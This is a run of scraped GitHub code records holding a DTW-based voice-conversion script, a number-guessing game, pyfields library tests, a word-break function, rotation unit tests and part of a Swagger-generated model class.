pysptk to extract mcep (copied from the above link): \n frameLength = 1024\n overlap = 0.25\n hop_length = frameLength * overlap\n order = 25\n alpha = 0.42\n gamma = -0.35\n \n sourceframes = librosa.util.frame(speech, frame_length=frameLength, hop_length=hop_length).astype(np.float64).T\n sourceframes *= pysptk.blackman(frameLength)\n sourcemcepvectors = np.apply_along_axis(pysptk.mcep, 1, sourceframes, order, alpha)\n \"\"\"\n # Check if data exists\n temp_filename = os.path.join(feature_path, \"{}_{}.pkl\".format(speaker, feat))\n\n frame = lbr.util.frame(audiodatum, frame_length=frame_length, hop_length=hop_length).T\n frame *= pysptk.blackman(frame_length)\n\n mcep = np.apply_along_axis(pysptk.mcep, 1, frame, order=order, alpha=alpha).T\n\n # Save to .pkl for later load\n # Move to calculating multiprocess call.\n # with open(temp_filename, \"wb\") as f:\n # pickle.dump(mceps, f, protocol=3)\n\n return mcep\n else:\n logging.critical('{} feature is not supported yet, exiting ...')\n exit()\n\n\ndef extract_features(audiodata, speaker, sr=16000, feat='mcep'):\n \"\"\"\n This will use multiprocess.Pool to parallel call _extract_features\n\n For example\n from multiprocessing import Pool\n p = Pool(5)\n def f(x):\n return x*x\n p.map(f, [1,2,3])\n\n :param audiodata:\n :param speaker:\n :param sr:\n :param feat:\n :return:\n \"\"\"\n # print(\"=======================\")\n logging.info(\"Extracting {} from {}'s data ...\".format(feat, speaker))\n temp_filename = os.path.join(feature_path, \"{}_{}.pkl\".format(speaker, feat))\n\n if os.path.isfile(temp_filename):\n logging.info(\"Found {}. Load data from {}_{}\".format(temp_filename, speaker, feat))\n\n with open(temp_filename, \"rb\") as f:\n return pickle.load(f), feat\n else:\n n_workers = int(cpu_rate * cpu_count())\n p = Pool(n_workers)\n\n results = p.starmap(_extract_features, zip(audiodata, itertools.repeat(speaker), itertools.repeat(sr), itertools.repeat(feat)))\n\n # print(feat)\n with open(temp_filename, \"wb\") as f:\n pickle.dump(results, f, protocol=3)\n\n return results, feat\n # raise NotImplementedError\n\n\n# EDIT 2018 Dec 17: This function will be removed. It will later be split to 3 separated function: `make_A`, `make_R`, `make_W`\n# See commit 4b0d1d716821934afb53b086bb9e351cc5d53f5b for \"before separating behavior\"\ndef make_dict_from_feat(feat_A, feat_B):\n \"\"\"\n Final function: return the \"dictionary\" of exemplars, which is construct by alignment of DTW\n Tentative: return a list, each item is a tuple size of 2, which is A and B, for src and tar speaker\n :param dtw_path: path[0], path[1]\n :return:\n \"\"\"\n dtw_paths = []\n\n for i in range(len(feat_A)):\n # dist, cost, cum_cost, path = dtw(feat_A[i].T, feat_B[i].T, lambda x, y: np.linalg.norm(x - y, ord=1))\n dist, path = fastdtw(feat_A[i].T, feat_B[i].T, dist=lambda x, y: np.linalg.norm(x - y, ord=1))\n dtw_paths.append(path)\n\n exemplars = []\n for idx_file, path in tqdm(enumerate(dtw_paths)):\n a = []\n b = []\n\n for it in range(len(path[0])):\n try:\n a.append(feat_A[idx_file].T[path[0][it]])\n b.append(feat_B[idx_file].T[path[1][it]])\n except Exception as e:\n input(\"Error occur. Press any key to exit ...\")\n exit()\n\n exemplars.append(np.stack([np.asarray(a), np.asarray(b)], axis=0))\n return exemplars\n\n\ndef _dtw_alignment(feat_A, feat_B):\n \"\"\"\n Note: this is file-based implementation for multiprocessing. Different from non-parallel version\n Calculate dtw_path, for constructing exemplar dictionaries (see make_exemplar_dict_A, R, W)\n :param feat_A: 1 audio file, with shape of (mel order, n_frames) (Note: not 162, this is function for parallel)\n :param feat_B: 1 audio file, with shape of (mel order, n_frames) (Note: not 162, this is function for parallel)\n :return: dtw path of 1 file\n \"\"\"\n logging.info(\"DTW on MCEP: Calculating warping function ...\")\n\n # dist, cost, cum_cost, path = dtw(feat_A.T, feat_B.T, lambda x, y: np.linalg.norm(x - y, ord=1))\n dist, cost, cum_cost, path = dtw(feat_A.T, feat_B.T, lambda x, y: sum(np.square(x - y)))\n\n return path\n\n\ndef dtw_alignment(feat_full_A, feat_full_B):\n \"\"\"\n This will use multiprocess.Pool to parallel call _dtw_alignment\n\n Calculate dtw_path, for constructing exemplar dictionaries (see make_exemplar_dict_A, R, W)\n :param feat_A: shape of (162 audio file, ...)\n :param feat_B: shape of (162 audio file, ...)\n :return: dtw path of 162 file\n \"\"\"\n logging.info(\"Parallel: DTW on MCEP: Calculating warping function ...\")\n\n # For parallel\n n_workers = int(cpu_rate * cpu_count())\n p = Pool(n_workers)\n dtw_paths = p.starmap(_dtw_alignment, zip(feat_full_A, feat_full_B))\n\n logging.info(\"Finish aligning. Warping mcep .... \")\n\n return dtw_paths, None, None\n\n # exemplars = []\n # full_A = []\n # full_B = []\n # for idx_file, path in tqdm(enumerate(dtw_paths)):\n # a = []\n # b = []\n #\n # for it in range(len(path[0])):\n # try:\n # a.append(feat_A[idx_file].T[path[0][it]])\n # b.append(feat_B[idx_file].T[path[1][it]])\n # except Exception as e:\n # input(\"Error occur. Press any key to exit ...\")\n # exit()\n #\n # full_A.append(np.asarray(a))\n # full_B.append(np.asarray(b))\n # # exemplars.append(np.stack([np.asarray(a), np.asarray(b)], axis=0))\n #\n # return dtw_paths, full_A, full_B\n\n\ndef make_exemplar_dict_A(dtw_paths, feat_A):\n \"\"\"\n :param feat_A: shape (162, ...)\n :param dtw_paths: shape (162 audio file, ...)\n :return: A_exemplar_dict.\n \"\"\"\n A_exemplars_dict = []\n\n for idx, path in enumerate(dtw_paths):\n temp = []\n for i in range(len(path[1])):\n temp.append(feat_A[idx][path[1][i]])\n\n A_exemplars_dict.append(np.asarray(temp))\n\n return A_exemplars_dict\n\n\ndef make_exemplar_dict_W(dtw_paths):\n return [path[0] for path in dtw_paths], [path[1] for path in dtw_paths]\n\n\ndef make_exemplar_dict_R(dtw_paths, feat_B):\n \"\"\"\n :param feat_A: shape (162, ...)\n :param dtw_paths: shape (162 audio file, ...)\n :return: A_exemplar_dict.\n \"\"\"\n R_exemplars_dict = []\n B_exemplars_dict = []\n\n for idx, path in enumerate(dtw_paths):\n temp = []\n for i in range(len(path[1])):\n temp.append(feat_B[idx][path[1][i]])\n\n B_exemplars_dict.append(np.asarray(temp))\n\n print(B_exemplars_dict[0].shape)\n for idx, exemplar in enumerate(B_exemplars_dict):\n temp = []\n for jjj in range(len(exemplar)):\n temp.append(np.exp(np.log(np.clip(feat_B[idx][jjj], 1e-10, None) - np.log(np.clip(exemplar[jjj], 1e-10, None)))))\n\n R_exemplars_dict.append(np.asarray(temp))\n\n return R_exemplars_dict\n\n# End of 2018 Dec 17 editing\n\n\n# EDIT: Add pickling exemplar dictionaries\ndef io_save_exemplar_dictionaries(exemplar_dict, protocol=3, savepath=\"data/vc/exem_dict\"):\n \"\"\"\n This function pickles every variables (exemplar dictionaries in this case) in args\n :param exemplar_dict:\n :param protocol:\n :param savepath:\n :return:\n \"\"\"\n os.system(\"mkdir -p {}\".format(savepath))\n\n for filename, value in exemplar_dict.items():\n with open(os.path.join(savepath, filename), \"wb\") as f:\n pickle.dump(value, f, protocol=protocol)\n\n logging.info(\"Done pickling warping function!!! Files are saved in data/vc/exem_dict/exemplar_W_A and B\")\n # raise NotImplementedError\n\n\ndef final_make_dict():\n # TODO should add argument to python call\n # TODO to specify which speaker to cover\n\n # Read audio time-series from npy\n logging.info(\"===================================================\")\n logging.info(\"Start reading audio time-series ...\")\n speakerAdata = io_read_speaker_data(data_path, speakerA, savetype='npy', parallel=True)[:nb_file]\n speakerBdata = io_read_speaker_data(data_path, speakerB, savetype='npy')[:nb_file]\n\n # Extract features from time-series FOR DTW-ALIGNMENT (f0, sp, ap is not included here)\n logging.info(\"===================================================\")\n logging.info(\"Start extracting mel feature for dtw alignment ...\")\n # feat_A, feat_type_A = extract_features(speakerAdata, speakerA, sr=sr, feat='mcep')\n # feat_B, feat_type_B = extract_features(speakerBdata, speakerB, sr=sr, feat='mcep')\n feat_A, feat_type_A = extract_features(speakerAdata, speakerA, sr=sr, feat='mfcc')\n feat_B, feat_type_B = extract_features(speakerBdata, speakerB, sr=sr, feat='mfcc')\n assert feat_type_A == feat_type_B, \"Inconsistent feature type. 2 speaker must have the same type of extracted features.\"\n\n # Get dtw path. Note that feat_A and feat_B will be transposed to (n_frames, mel-cepstral order) shape\n logging.info(\"===================================================\")\n logging.info(\"Start aligning (with dtw) ...\")\n dtw_paths, feat_A, feat_B = dtw_alignment(feat_A, feat_B)\n\n # exemplar_A = make_exemplar_dict_A(dtw_paths, feat_A)\n # exemplar_R = make_exemplar_dict_R(dtw_paths, feat_B)\n logging.info(\"===================================================\")\n exemplar_W_A, exemplar_W_B = make_exemplar_dict_W(dtw_paths)\n\n logging.info(\"Save dtw-paths to .pkl\")\n io_save_exemplar_dictionaries({\n # 'exemplar_A': exemplar_A,\n # 'exemplar_R': exemplar_R,\n 'exemplar_W_A': exemplar_W_A,\n 'exemplar_W_B': exemplar_W_B\n })\n\n # exemplars = make_dict_from_feat(feat_A, feat_B)\n # print(exemplars[0].shape, exemplars[1].shape)\n #\n # # Dump to npy\n # os.system(\"mkdir -p \" + feature_path)\n # # with open(os.path.join(feature_path, speakerA + \"2\" + speakerB + \"_mfcc_25ms_10ms_norm\" + \".pkl\"), \"wb\") as f:\n # with open(os.path.join(feature_path, \"{}2{}_{}_{}ms_{}ms.pkl\".format(\n # speakerA, speakerB, 'mcep', int(frame_length * 1000 / sr), int(hop_length * 1000 / sr))), \"wb\") as f:\n # pickle.dump(exemplars, f, protocol=3)\n\n # np.save(os.path.join(feature_path, speakerA + \"2\" + speakerB + \"_mfcc\" + \".npy\"), exemplars)\n\n\ndef debug_profiling_main():\n start = time.time()\n cProfile.run('final_make_dict()')\n logging.info(\"Elapsed time: {}\".format(time.time() - start))\n\n\nif __name__ == \"__main__\":\n final_make_dict()\n # cProfile.run('final_make_dict()', )\n","repo_name":"entn-at/exemplars_vc","sub_path":"01_make_dict_parallel.py","file_name":"01_make_dict_parallel.py","file_ext":"py","file_size_in_byte":14498,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"}
+{"seq_id":"1733569132","text":"#Guess the number the computer has in mind.\nimport random\n\ndef guess(num,allowedCount):\n randomNum = random.randint(1, num)\n guess = 0\n count = 0\n while guess != randomNum and count != allowedCount:\n guess = int(input(\"Guess the number: \"))\n count += 1\n tries = allowedCount - count\n if guess < randomNum:\n print(f\"Guess again, value is too low. You have {tries} tries left!\")\n elif guess > randomNum:\n print(f\"Guess again, value is too high. You have {tries} tries left!\")\n if guess != randomNum and count == allowedCount:\n print(f\"Better Luck Next Time, the value was {randomNum}.\")\n else:\n print(f'Congratulations!!!, You have guessed {randomNum} correctly in {count} tries!!!')\n\ndef guessComp(num):\n low = 1\n high = num\n feedback = \"\"\n count = 0\n while feedback != \"c\":\n if low != high:\n guess = random.randint(low,high)\n else:\n guess = low\n count += 1\n feedback = input(f\"The computer guessed {guess}. is it higher(H), lower(L) or Correct(C)??\").lower()\n if feedback == 'h':\n high = guess - 1\n elif feedback == 'l':\n low = guess + 1\n print(f\"The computer found your number ({guess}) in {count} tries!!!\")\n\nprint(\"GUESS THE NUMBER\")\nprint('Select a level of difficulty \\n \\\npress 1 for Easy \\n \\\npress 2 for Medium \\n \\\npress 3 for Hard \\n\\n \\\npress 5 to play Computer guess your number')\n\ntry:\n level = int(input())\n if level == 1:\n print('Easy Difficulty - 1 to 10 \\n You have 3 Guesses.')\n guess(10,3)\n elif level == 2:\n print('Medium Difficulty - 1 to 40 \\n You have 5 Guesses.')\n guess(40,5)\n elif level ==3:\n print('Hard Difficulty - 1 to 100 \\n You have 5 Guesses.')\n guess(100,5)\n elif level == 5:\n high = int(input('Provide the range which include your number: '))\n guessComp(high)\n else:\n print(\"Please make a valid selection.\")\nexcept:\n print(\"Enter a valid input\")\n","repo_name":"InvisiblePro/Hacktoberfest-2022","sub_path":"Python/Guess_the_number.py","file_name":"Guess_the_number.py","file_ext":"py","file_size_in_byte":2058,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"53"}
+{"seq_id":"34752264654","text":"import os\nimport sys\nimport timeit\n\nimport pytest\nfrom valid8 import ValidationError, ValidationFailure\n\nfrom pyfields import field, MandatoryFieldInitError, make_init, init_fields, ReadOnlyFieldError, NoneError, \\\n FieldTypeError, autoclass, get_fields\n\n\ndef test_lazy_fields():\n\n class Wall(object):\n height = field(doc=\"Height of the wall in mm.\") # type: int\n color = field(default='white', doc=\"Color of the wall.\") # type: str\n\n # create an instance\n w = Wall()\n\n # the field is visible in `dir`\n assert dir(w)[-2:] == ['color', 'height']\n\n # but not yet in `vars`\n assert vars(w) == dict()\n\n # lets ask for it - default value is affected\n print(w.color)\n\n # now it is in `vars` too\n assert vars(w) == {'color': 'white'}\n\n # mandatory field\n with pytest.raises(MandatoryFieldInitError) as exc_info:\n print(w.height)\n assert str(exc_info.value).startswith(\"Mandatory field 'height' has not been initialized yet on instance <\")\n\n w.height = 12\n assert vars(w) == {'color': 'white', 'height': 12}\n\n\n@pytest.mark.parametrize(\"use_decorator\", [False, True], ids=\"use_decorator={}\".format)\ndef test_default_factory(use_decorator):\n\n class BadPocket(object):\n items = field(default=[])\n\n p = BadPocket()\n p.items.append('thing')\n g = BadPocket()\n assert g.items == ['thing']\n\n if use_decorator:\n class Pocket:\n items = field()\n\n @items.default_factory\n def default_items(self):\n return []\n else:\n class Pocket(object):\n items = field(default_factory=lambda obj: [])\n\n p = Pocket()\n g = Pocket()\n p.items.append('thing')\n assert p.items == ['thing']\n assert g.items == []\n\n\ndef test_readonly_field():\n \"\"\" checks that the example in the readme is correct \"\"\"\n\n class User(object):\n name = field(read_only=True)\n\n u = User()\n u.name = \"john\"\n assert \"name: %s\" % u.name == \"name: john\"\n with pytest.raises(ReadOnlyFieldError) as exc_info:\n u.name = \"john2\"\n qualname = User.__dict__['name'].qualname\n assert str(exc_info.value) == \"Read-only field '%s' has already been \" \\\n \"initialized on instance %s and cannot be modified anymore.\" % (qualname, u)\n\n class User(object):\n name = field(read_only=True, default=\"dummy\")\n\n u = User()\n assert \"name: %s\" % u.name == \"name: dummy\"\n with pytest.raises(ReadOnlyFieldError):\n u.name = \"john\"\n\n\n@pytest.mark.parametrize(\"py36_style_type_hints\", [False, True], ids=\"py36_style_type_hints={}\".format)\ndef test_type_validation(py36_style_type_hints):\n if py36_style_type_hints:\n if sys.version_info < (3, 6):\n pytest.skip()\n Wall = None\n else:\n # import the test that uses python 3.6 type annotations\n from ._test_py36 import _test_readme_type_validation\n Wall = _test_readme_type_validation()\n else:\n class Wall(object):\n height = field(type_hint=int, check_type=True, doc=\"Height of the wall in mm.\")\n color = field(type_hint=str, check_type=True, default='white', doc=\"Color of the wall.\")\n\n w = Wall()\n w.height = 1\n with pytest.raises(TypeError):\n w.height = \"1\"\n\n\n@pytest.mark.parametrize(\"py36_style_type_hints\", [False, True], ids=\"py36_style_type_hints={}\".format)\ndef test_value_validation(py36_style_type_hints):\n colors = ('blue', 'red', 'white')\n\n if py36_style_type_hints:\n if sys.version_info < (3, 6):\n pytest.skip()\n Wall = None\n else:\n # import the test that uses python 3.6 type annotations\n from ._test_py36 import _test_readme_value_validation\n Wall = _test_readme_value_validation(colors)\n\n from mini_lambda import x\n from valid8.validation_lib import is_in\n\n class Wall(object):\n height = field(type_hint=int,\n validators={'should be a positive number': x > 0,\n 'should be a multiple of 100': x % 100 == 0},\n doc=\"Height of the wall in mm.\")\n color = field(type_hint=str,\n validators=is_in(colors),\n default='white', doc=\"Color of the wall.\")\n\n w = Wall()\n w.height = 100\n with pytest.raises(ValidationError) as exc_info:\n w.height = 1\n assert \"Successes: ['x > 0'] / Failures: {\" \\\n \"'x % 100 == 0': 'InvalidValue: should be a multiple of 100. Returned False.'\" \\\n \"}.\" in str(exc_info.value)\n\n with pytest.raises(ValidationError) as exc_info:\n w.color = 'magenta'\n assert \"NotInAllowedValues: x in ('blue', 'red', 'white') does not hold for x=magenta. Wrong value: 'magenta'.\" \\\n in str(exc_info.value)\n\n\n@pytest.mark.parametrize(\"py36_style_type_hints\", [False, True], ids=\"py36_style_type_hints={}\".format)\ndef test_value_validation_advanced(py36_style_type_hints):\n\n class InvalidWidth(ValidationFailure):\n help_msg = 'should be a multiple of the height ({height})'\n\n def validate_width(obj, width):\n if width % obj.height != 0:\n raise InvalidWidth(width, height=obj.height)\n\n if py36_style_type_hints:\n if sys.version_info < (3, 6):\n pytest.skip()\n Wall = None\n else:\n # import the test that uses python 3.6 type annotations\n from ._test_py36 import test_value_validation_advanced\n Wall = test_value_validation_advanced(validate_width)\n else:\n class Wall(object):\n height = field(type_hint=int,\n doc=\"Height of the wall in mm.\")\n width = field(type_hint=str,\n validators=validate_width,\n doc=\"Width of the wall in mm.\")\n\n w = Wall()\n w.height = 100\n w.width = 200\n\n with pytest.raises(ValidationError) as exc_info:\n w.width = 201\n assert \"InvalidWidth: should be a multiple of the height (100). Wrong value: 201.\" in str(exc_info.value)\n\ntry:\n from typing import Optional\n typing_present = True\nexcept ImportError:\n typing_present = False\n\n\n@pytest.mark.skipif(not typing_present, reason=\"typing module is not present\")\n@pytest.mark.parametrize(\"declaration\", ['typing', 'default_value', 'explicit_nonable'], ids=\"declaration={}\".format)\ndef test_nonable_fields(declaration):\n \"\"\"Tests that nonable fields are supported and correctly handled\"\"\"\n\n if declaration == 'typing':\n from typing import Optional\n \n class Foo(object):\n a = field(type_hint=Optional[int], check_type=True)\n b = field(type_hint=Optional[int], validators={'is positive': lambda x: x > 0})\n c = field(nonable=False, check_type=True)\n d = field(validators={'accept_all': lambda x: True})\n e = field(nonable=False)\n\n elif declaration == 'default_value':\n class Foo(object):\n a = field(type_hint=int, default=None, check_type=True)\n b = field(type_hint=int, default=None, validators={'is positive': lambda x: x > 0})\n c = field(nonable=False, check_type=True)\n d = field(validators={'accept_all': lambda x: True})\n e = field(nonable=False)\n\n elif declaration == 'explicit_nonable':\n class Foo(object):\n a = field(type_hint=int, nonable=True, check_type=True)\n b = field(type_hint=int, nonable=True, validators={'is positive': lambda x: x > 0})\n c = field(nonable=False, check_type=True)\n d = field(validators={'accept_all': lambda x: True})\n e = field(nonable=False)\n\n else:\n raise ValueError(declaration)\n\n f = Foo()\n f.a = None\n f.b = None\n with pytest.raises(NoneError):\n f.c = None\n f.d = None\n f.e = None\n assert vars(f) == {'_a': None, '_b': None, '_d': None, 'e': None}\n\n\ndef test_native_descriptors():\n \"\"\"\"\"\"\n class Foo:\n a = field()\n b = field(native=False)\n\n a_name = \"test_native_descriptors..Foo.a\" if sys.version_info >= (3, 6) else \".None\"\n b_name = \"test_native_descriptors..Foo.b\" if sys.version_info >= (3, 6) else \".None\"\n assert repr(Foo.__dict__['a']) == \"\" % a_name\n assert repr(Foo.__dict__['b']) == \"\" % b_name\n\n f = Foo()\n\n def set_native(): f.a = 12\n\n def set_descript(): f.b = 12\n\n def set_pynative(): f.c = 12\n\n # make sure that the access time for native field and native are identical\n # --get rid of the first init since it is a bit longer (replacement of the descriptor with a native field\n set_native()\n set_descript()\n set_pynative()\n\n # --now compare the executiong= times\n t_native = timeit.Timer(set_native).timeit(10000000)\n t_descript = timeit.Timer(set_descript).timeit(10000000)\n t_pynative = timeit.Timer(set_pynative).timeit(10000000)\n\n print(\"Average time (ns) setting the field:\")\n print(\"%0.2f (normal python) ; %0.2f (native field) ; %0.2f (descriptor field)\"\n % (t_pynative, t_native, t_descript))\n\n ratio = t_native / t_pynative\n print(\"Ratio is %.2f\" % ratio)\n assert ratio <= 1.2\n\n\n# def decompose(number):\n# \"\"\" decompose a number in scientific notation. from https://stackoverflow.com/a/45359185/7262247\"\"\"\n# (sign, digits, exponent) = Decimal(number).as_tuple()\n# fexp = len(digits) + exponent - 1\n# fman = Decimal(number).scaleb(-fexp).normalize()\n# return fman, fexp\n\n\ndef test_make_init_full_defaults():\n class Wall:\n height = field(doc=\"Height of the wall in mm.\") # type: int\n color = field(default='white', doc=\"Color of the wall.\") # type: str\n __init__ = make_init()\n\n # create an instance\n help(Wall)\n with pytest.raises(TypeError) as exc_info:\n Wall()\n assert str(exc_info.value).startswith(\"__init__()\")\n\n w = Wall(2)\n assert vars(w) == {'color': 'white', 'height': 2}\n\n w = Wall(color='blue', height=12)\n assert vars(w) == {'color': 'blue', 'height': 12}\n\n\ndef test_make_init_with_explicit_list():\n class Wall:\n height = field(doc=\"Height of the wall in mm.\") # type: int\n color = field(default='white', doc=\"Color of the wall.\") # type: str\n\n # only `height` will be in the constructor\n __init__ = make_init(height)\n\n with pytest.raises(TypeError) as exc_info:\n Wall(1, 'blue')\n assert str(exc_info.value).startswith(\"__init__()\")\n\n\ndef test_make_init_with_inheritance():\n class Wall:\n height = field(doc=\"Height of the wall in mm.\") # type: int\n __init__ = make_init(height)\n\n class ColoredWall(Wall):\n color = field(default='white', doc=\"Color of the wall.\") # type: str\n __init__ = make_init(Wall.height, color)\n\n w = ColoredWall(2)\n assert vars(w) == {'color': 'white', 'height': 2}\n\n w = ColoredWall(color='blue', height=12)\n assert vars(w) == {'color': 'blue', 'height': 12}\n\n\ndef test_make_init_callback():\n class Wall:\n height = field(doc=\"Height of the wall in mm.\") # type: int\n color = field(default='white', doc=\"Color of the wall.\") # type: str\n\n def post_init(self, msg='hello'):\n \"\"\"\n After initialization, some print message is done\n :param msg: the message details to add\n :return:\n \"\"\"\n print(\"post init ! height=%s, color=%s, msg=%s\" % (self.height, self.color, msg))\n self.non_field_attr = msg\n\n # only `height` and `foo` will be in the constructor\n __init__ = make_init(height, post_init_fun=post_init)\n\n w = Wall(1, 'hey')\n assert vars(w) == {'color': 'white', 'height': 1, 'non_field_attr': 'hey'}\n\n\ndef test_init_fields():\n class Wall:\n height = field(doc=\"Height of the wall in mm.\") # type: int\n color = field(default='white', doc=\"Color of the wall.\") # type: str\n\n @init_fields\n def __init__(self, msg='hello'):\n \"\"\"\n After initialization, some print message is done\n :param msg: the message details to add\n :return:\n \"\"\"\n print(\"post init ! height=%s, color=%s, msg=%s\" % (self.height, self.color, msg))\n self.non_field_attr = msg\n\n # create an instance\n help(Wall.__init__)\n with pytest.raises(TypeError) as exc_info:\n Wall()\n assert str(exc_info.value).startswith(\"__init__()\")\n\n w = Wall(2)\n assert vars(w) == {'color': 'white', 'height': 2, 'non_field_attr': 'hello'}\n\n w = Wall(msg='hey', color='blue', height=12)\n assert vars(w) == {'color': 'blue', 'height': 12, 'non_field_attr': 'hey'}\n\n\nno_type_checker = False\ntry:\n import typeguard\nexcept ImportError:\n try:\n import pytypes\n except ImportError:\n no_type_checker = True\n\n\n@pytest.mark.skipif(sys.version_info < (3, 6), reason=\"python < 3.6 does not support class member type hints\")\n@pytest.mark.skipif(no_type_checker, reason=\"no type checker is installed\")\ndef test_autofields_readme():\n \"\"\"Test for readme on autofields\"\"\"\n\n from ._test_py36 import _test_autofields_readme\n Pocket, Item, Pocket2 = _test_autofields_readme()\n\n with pytest.raises(TypeError):\n Item()\n\n item1 = Item(name='1')\n pocket1 = Pocket(size=2)\n pocket2 = Pocket(size=2)\n\n # make sure that custom constructor is not overridden by @autofields\n pocket3 = Pocket2(\"world\")\n with pytest.raises(MandatoryFieldInitError):\n pocket3.size\n\n # make sure the items list is not the same in both (if we add the item to one, they do not appear in the 2d)\n assert pocket1.size == 2\n assert pocket1.items is not pocket2.items\n pocket1.items.append(item1)\n assert len(pocket2.items) == 0\n\n\ntry:\n import pytypes\nexcept ImportError:\n has_pytypes = False\nelse:\n has_pytypes = True\n\n\n@pytest.mark.skipif(has_pytypes, reason=\"pytypes does not correctly support vtypes - \"\n \"see https://github.com/Stewori/pytypes/issues/86\")\n@pytest.mark.skipif(sys.version_info < (3, 6), reason=\"python < 3.6 does not support class member type hints\")\ndef test_autofields_vtypes_readme():\n\n from ._test_py36 import _test_autofields_vtypes_readme\n Rectangle = _test_autofields_vtypes_readme()\n\n r = Rectangle(1, 2)\n with pytest.raises(FieldTypeError):\n Rectangle(1, -2)\n with pytest.raises(FieldTypeError):\n Rectangle('1', 2)\n\n\ndef test_autoclass():\n \"\"\" Tests the example with autoclass in the doc \"\"\"\n @autoclass\n class Foo(object):\n msg = field(type_hint=str)\n age = field(default=12, type_hint=int)\n\n foo = Foo(msg='hello')\n\n assert [f.name for f in get_fields(Foo)] == ['msg', 'age']\n\n print(foo) # automatic string representation\n print(foo.to_dict()) # dict view\n\n assert str(foo) == \"Foo(msg='hello', age=12)\"\n assert str(foo.to_dict()) in (\"{'msg': 'hello', 'age': 12}\", \"{'age': 12, 'msg': 'hello'}\")\n assert foo == Foo(msg='hello', age=12) # comparison (equality)\n assert foo == {'msg': 'hello', 'age': 12} # comparison with dicts\n\n\n@pytest.mark.skipif(sys.version_info < (3, 6), reason=\"not valid for old python\")\ndef test_autoclass_2():\n from ._test_py36 import _test_autoclass2\n Foo = _test_autoclass2()\n\n # assert [f.name for f in get_fields(Foo)] == ['msg', 'age', 'height']\n\n foo = Foo(msg='hello')\n\n assert repr(foo) == \"Foo(msg='hello', age=12, height=50)\" # automatic string representation\n assert str(foo.to_dict()) # automatic dict view\n\n assert foo == Foo(msg='hello', age=12, height=50) # automatic equality comparison\n assert foo == {'msg': 'hello', 'age': 12, 'height': 50} # automatic eq comparison with dicts\n\n\n@pytest.mark.skipif(sys.version_info < (3, 6), reason=\"not valid for old python\")\ndef test_autoclass_3():\n from ._test_py36 import _test_autoclass3\n Foo = _test_autoclass3()\n\n # assert [f.name for f in get_fields(Foo)] == ['msg', 'age', 'height']\n\n foo = Foo(msg='hello')\n\n with pytest.raises(AttributeError):\n foo.to_dict() # method does not exist\n\n assert repr(foo) == \"Foo(msg='hello', age=12, height=50)\" # automatic string representation\n assert foo == Foo(msg='hello', age=12, height=50) # automatic equality comparison\n\n # type checking ON\n with pytest.raises(FieldTypeError):\n foo.msg = 1\n","repo_name":"smarie/python-pyfields","sub_path":"pyfields/tests/test_readme.py","file_name":"test_readme.py","file_ext":"py","file_size_in_byte":16554,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"53"}
+{"seq_id":"21352462697","text":"# !/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nvocab = [\"mobile\",\"samsung\",\"sam\",\"sung\",\n \"man\",\"mango\",\"icecream\",\"and\",\n \"go\",\"i\",\"like\",\"ice\",\"cream\"]\n\ndef f(inp):\n n = len(inp)\n if n == 0:\n return True\n for i in range(n+1):\n if inp[0:i] in vocab and f(inp[i:]):\n return True\n return False\n \n \ninp = 'ilikesamsungandicecream'\nprint(f(inp))\n","repo_name":"SeanLee97/datastruct_and_algorithms","sub_path":"dp/Word_Break/recursive.py","file_name":"recursive.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":38,"dataset":"github-code","pt":"53"}
+{"seq_id":"20871611792","text":"import unittest\nfrom numpy import cos, log, pi as PI, sin\n\nfrom numeric.e2.rotation import Rotation\n\n\nclass BasicTestSuite(unittest.TestCase):\n\n def f(self, x):\n return sin(x)\n\n interval = [PI, 7 * PI]\n angle = PI / 8\n x = 3\n\n def test_rotated_interval(self):\n\n rotation = Rotation(self.f, self.interval, self.angle)\n interval_rotated = rotation.get_interval_after_rotation()\n left_expected = self.interval[0] * cos(self.angle) - self.f(self.interval[0]) * sin(self.angle)\n right_expected = self.interval[1] * cos(self.angle) - self.f(self.interval[1]) * sin(self.angle)\n self.assertAlmostEqual(left_expected, interval_rotated[0])\n self.assertAlmostEqual(right_expected, interval_rotated[1])\n\n def test_point_before_rotation(self):\n expected_point_before_rotation = [self.x, self.f(self.x)]\n expected_point_after_rotation = [self.x * cos(self.angle) - self.f(self.x) * sin(self.angle),\n self.x * sin(self.angle) + self.f(self.x) * cos(self.angle)]\n\n rotation = Rotation(self.f, self.interval, self.angle)\n rotation.approximate_rotated_y(expected_point_after_rotation[0])\n actual_point_before_rotation = rotation.get_point_before_rotation()\n\n self.assertAlmostEqual(expected_point_before_rotation[0], actual_point_before_rotation[0])\n self.assertAlmostEqual(expected_point_before_rotation[1], actual_point_before_rotation[1])\n\n def test_point_after_rotation(self):\n expected_point_after_rotation = [self.x * cos(self.angle) - self.f(self.x) * sin(self.angle),\n self.x * sin(self.angle) + self.f(self.x) * cos(self.angle)]\n\n rotation = Rotation(self.f, self.interval, self.angle)\n rotation.approximate_rotated_y(expected_point_after_rotation[0])\n actual_point_after_rotation = rotation.get_point_after_rotation()\n\n self.assertAlmostEqual(expected_point_after_rotation[0], actual_point_after_rotation[0])\n self.assertAlmostEqual(expected_point_after_rotation[1], actual_point_after_rotation[1])\n\n\nif __name__ == '__main__':\n unittest.main()","repo_name":"macksimiljan/num3ric","sub_path":"tests/e2/test_rotation.py","file_name":"test_rotation.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"1104211349","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom swagger_server.models.base_model_ import Model\nfrom swagger_server.models.network_identifier import NetworkIdentifier # noqa: F401,E501\nfrom swagger_server.models.partial_block_identifier import PartialBlockIdentifier # noqa: F401,E501\nfrom swagger_server import util\n\n\nclass BlockRequest(Model):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n def __init__(self, network_identifier: NetworkIdentifier=None, block_identifier: PartialBlockIdentifier=None): # noqa: E501\n \"\"\"BlockRequest - a model defined in Swagger\n\n :param network_identifier: The network_identifier of this BlockRequest. # noqa: E501\n :type network_identifier: NetworkIdentifier\n :param block_identifier: The block_identifier of this BlockRequest. # noqa: E501\n :type block_identifier: 